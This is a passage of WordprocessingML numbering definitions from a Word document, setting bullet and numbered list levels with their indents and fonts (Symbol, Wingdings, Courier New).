      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B1384860">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DF380796">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="806C4A6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8640AEAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2A3F9AAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="40A20114">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CF86CEF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4242556C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="62C4857C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7E201A8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6CB0F334">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B008A958">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3C529158">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="57E8DF7A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2A4455ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="0D76EDAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7AE2949A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="72DAA434">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F2987B6A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="14D23820">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="82927E00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="63AE661C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9DE84EA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0854015A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2D2A5FBC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="D2140366">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A82C53A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3ECA4C44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5D4800E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="02C46522">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="693A4398">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6E4253AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="34E0BCBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="327E9B72">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2F1B66A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F864CE42"/>
    <w:lvl w:ilvl="0" w:tplc="50EA74F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="36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2FF9BA2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EA885D6"/>
    <w:lvl w:ilvl="0" w:tplc="FEE6638A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0E92484E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="33C224EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="106C777C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3DCE6306">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="62E8B2D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D1E49CB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="216EBEB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1AB63314">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3116D674"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="CC5688EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="915A9D48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="56743972">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="22C434A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E0A849F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="12165124">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6758F774">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E506CB5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BB04248E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34C4E436"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="25EC514A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F9503F86">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6A60633E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D12E8F54">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1DFA6F7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7DC46DCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A61ACA1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="92CAF2CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="25E63284">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="35" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34F56372"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D540869E"/>
    <w:lvl w:ilvl="0" w:tplc="7144A9CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6DC818D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7E669D04">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3A94A500">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="696825EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9FFAE9F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6632F740">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FBA81DA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1CD6BE08">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="36" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="39EE4393"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="947CD894">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="27A2D07E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
